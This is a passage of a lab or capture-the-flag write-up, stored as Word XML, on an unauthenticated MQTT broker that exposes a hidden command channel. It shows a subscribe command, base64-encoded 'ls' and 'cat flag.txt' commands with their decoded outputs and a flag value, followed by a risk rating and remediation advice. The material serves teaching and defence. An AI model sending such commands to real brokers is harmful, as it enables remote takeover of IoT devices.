        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6591519D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## 4. Listening for Responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F4DA3E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Received the response for `ls` command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566526B5" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="018AD1B6" w14:textId="5AE3F0B0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![LS Response]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75958293" wp14:editId="017B9C32">
            <wp:extent cx="5731510" cy="525145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="19274140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14015" name="Picture 19274140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F26E" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB05276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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29583868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mosquitto_sub -h $BROKER_IP -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878C8D2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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBCEE5E" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471149F7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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F5CF2" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68ADB668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# PHASE 6: COMMAND EXECUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3BB5C8" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB9991D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### Running `ls` Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2733D743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**Payload Sent:** Base64-encoded `ls` command  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5E435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**Response Received (decoded):**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA087F1" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B8BF55B" w14:textId="1E86841C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![Flag.txt Response]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E609DC4" wp14:editId="6425F074">
            <wp:extent cx="5731510" cy="338455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="19998286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28604" name="Picture 199982860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5E81" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D46486B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lastRenderedPageBreak/>
        <w:t>```json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C54E445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{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "response": "flag.txt\n"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC61C22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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3221DD" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5449E922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### Preparing `cat flag.txt` Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3281B2FD" w14:textId="52E5A9A2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![CyberChef Cat Command]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB3586E" wp14:editId="035E4765">
            <wp:extent cx="5731510" cy="2818765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="13603802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80222" name="Picture 136038022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747E" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CCDE4C8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### Executing the Flag Read Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CEB2C9" w14:textId="1100802C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![Command Execution]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61844080" wp14:editId="340DD065">
            <wp:extent cx="5731510" cy="349250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15709687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68729" name="Picture 157096872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929A" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ADDDFA8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**Payload Sent:** Base64-encoded `cat flag.txt` command  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA1555" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35714DE6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### Receiving Base64 Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C6393C" w14:textId="3FE9A89B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![Base64 Response]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09A6F1D9" wp14:editId="6A00E8A3">
            <wp:extent cx="5731510" cy="955040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7272903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90321" name="Picture 72729032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93FB" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CFCE37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**Response Received (decoded):**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C26D925" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496506A8" w14:textId="538FB2F5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![Final Flag Decoded]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD1445C" wp14:editId="29214728">
            <wp:extent cx="5731510" cy="413385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="20459324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32416" name="Picture 20459324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26EF" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8B78BD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```json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3C34C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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C88363E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"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095B720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"response": "flag{18d44fc0707ac8dc8be45bb83db54013}\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9F0EDA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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4309C54B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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E2B113" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB01625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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E6708" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D34C5D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# FINAL FLAG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2556F1" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F851625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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAF64EE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flag{18d44fc0707ac8dc8be45bb83db54013}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BFCFFC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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279AC200" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77115077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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E48D698" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5D7EAD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# Risk Rating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD19D9F" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2098B075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**Severity:** CRITICAL  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB64E39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**Impact:** Remote Command Execution (RCE)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E3B2C2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**Attack Vector:** Network  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D6BFA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**Privileges Required:** None  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F345C2B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**User Interaction:** None  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C0AB53" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1879507E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**Consequences:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0111B43D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lastRenderedPageBreak/>
        <w:t>* Remote system command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3C400F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* Arbitrary file access and exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65724641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* Complete device compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFE29E7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* Potential lateral movement within network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109A75DC" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A844FA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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226AEC4F" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF86318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# </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3F49">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3F49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FE8C1A" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31518901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### 1. **Enable MQTT Authentication**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2001B0C0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 Implement username/password authentication for all broker connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE670DD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 ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5284DA8D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 allow_anonymous false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC12E43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 password_file /etc/mosquitto/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07188E6B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 ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C5CB0" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1CA028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### 2. **Enforce TLS Encryption**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6838FEAA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 Require MQTT over TLS/SSL to prevent interception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8E9B51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 ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E97148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 listener 8883</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AB9E91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 certfile /etc/mosquitto/certs/server.crt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EED81F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 keyfile /etc/mosquitto/certs/server.key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE606FC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 ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A6D6C6" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098A52FC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### 3. **Implement Access Control Lists (ACLs)**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9E33FD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 Restrict topics per user/client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423D2B5B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 ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB50F9C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 topic read $SYS/#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2024AD70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 topic write devices/+/command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1E6C64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 ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3115D7" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421FA6F5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lastRenderedPageBreak/>
        <w:t>### 4. **Disable Wildcard Subscriptions**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5354D447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 Limit topic access to prevent information disclosure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7860885F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 ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5CA9E3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 acl_deny_write_pattern #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEE293B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 acl_deny_read_pattern #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB08604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 ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4512092A" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF6758F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### 5. **Input Validation &amp; Sanitization**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08DEF8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 Validate all incoming messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E98C7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 - Verify command format and structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5017C51C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 - Restrict allowed commands to whitelist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF1B391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 - Implement rate limiting per client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658286D5" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B7B8C51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### 6. **Network Segmentation**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC2F1B1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 Isolate IoT devices on separate VLANs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABEED37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 Implement firewall rules restricting MQTT access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799F2F9E" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF2BC07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### 7. **Regular Security Audits**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D244DA7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 - Monitor MQTT traffic for anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C3FC45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 - Regularly update Mosquitto broker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB1E5F8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 xml:space="preserve">   - Conduct penetration tests on IoT infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD01B28" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66AEB2FB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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57154523" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660A3684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# Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DA47E3" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41049273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This engagement demonstrated how **insecure MQTT configurations** can expose critical attack surfaces in IoT environments. The complete lack of authentication, combined with a hidden command channel, allowed for full system compromise through simple message publishing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67732E73" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C9E877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lastRenderedPageBreak/>
        <w:t>The methodology followed mirrors **real-world IoT penetration testing**, where message brokers often become the weakest link in connected device ecosystems. This case highlights the importance of securing MQTT implementations in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E7EC49" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506051D5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**Key Takeaways:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3043C1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1. Never expose MQTT brokers without authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A401C1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2. Always encrypt IoT communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E41D42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3. Implement strict topic and command authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08434625" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3F49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Regularly audit IoT device communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A45EBD" w14:textId="17E6B2C4" w:rsidR="00D939EA" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:r w:rsidRPr="00EA3F49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Assume any exposed service will be discovered and exploited</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D939EA" w:rsidRPr="00EA3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F49"/>
    <w:rsid w:val="0023753F"/>
    <w:rsid w:val="00814CDC"/>
    <w:rsid w:val="00BA1BE4"/>
    <w:rsid w:val="00D368BA"/>
    <w:rsid w:val="00D939EA"/>
    <w:rsid w:val="00EA3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23D47"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C608D5E5-F7BE-407A-8E76-7B753B7C2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F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F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F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F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F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F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F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F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F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1025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Meraj Khan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Meraj Khan</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-11T08:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-11T08:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>